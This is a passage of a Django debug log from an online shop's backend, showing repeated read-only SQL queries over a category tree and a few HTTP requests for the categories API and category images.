"shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 10:37:49,624 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 10:37:49,627 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 10:37:49,630 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 10:37:49,632 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 10:37:49,634 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 10:37:49,636 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 10:37:49,639 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 10:37:49,642 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 10:37:49,644 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 10:37:49,646 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 10:37:49,648 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 10:37:49,651 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 10:37:49,654 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 10:37:49,656 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 10:37:49,658 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 10:37:49,661 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 10:37:49,663 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 10:37:49,665 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 10:37:49,668 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 10:37:49,670 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 10:37:49,672 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 10:37:49,675 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 10:37:49,677 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 10:37:49] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 10:37:50] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-19 10:37:50,251 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 10:37:50,258 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 10:37:50,265 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 10:37:50,268 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 10:37:50,272 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 10:37:50,275 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 10:37:50,278 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 10:37:50,280 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 10:37:50,283 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 10:37:50,286 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 10:37:50,289 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 10:37:50,291 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 10:37:50,294 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 10:37:50,296 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 10:37:50,300 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 10:37:50,303 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) [19/Dec/2019 10:37:50] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 DEBUG 2019-12-19 10:37:50,306 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 10:37:50,309 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 10:37:50,312 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 10:37:50,317 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 10:37:50,321 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 10:37:50,324 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 10:37:50,327 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 10:37:50,330 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 10:37:50,333 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 10:37:50,338 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 10:37:50,341 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 10:37:50,344 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 10:37:50,348 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 10:37:50,351 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 10:37:50,355 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 10:37:50,359 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 10:37:50,363 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 10:37:50,367 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 10:37:50,372 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 10:37:50,377 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 10:37:50,380 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 10:37:50,383 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 10:37:50,387 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 10:37:50,390 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 10:37:50,393 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 10:37:50,397 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 10:37:50,401 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 10:37:50,404 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", 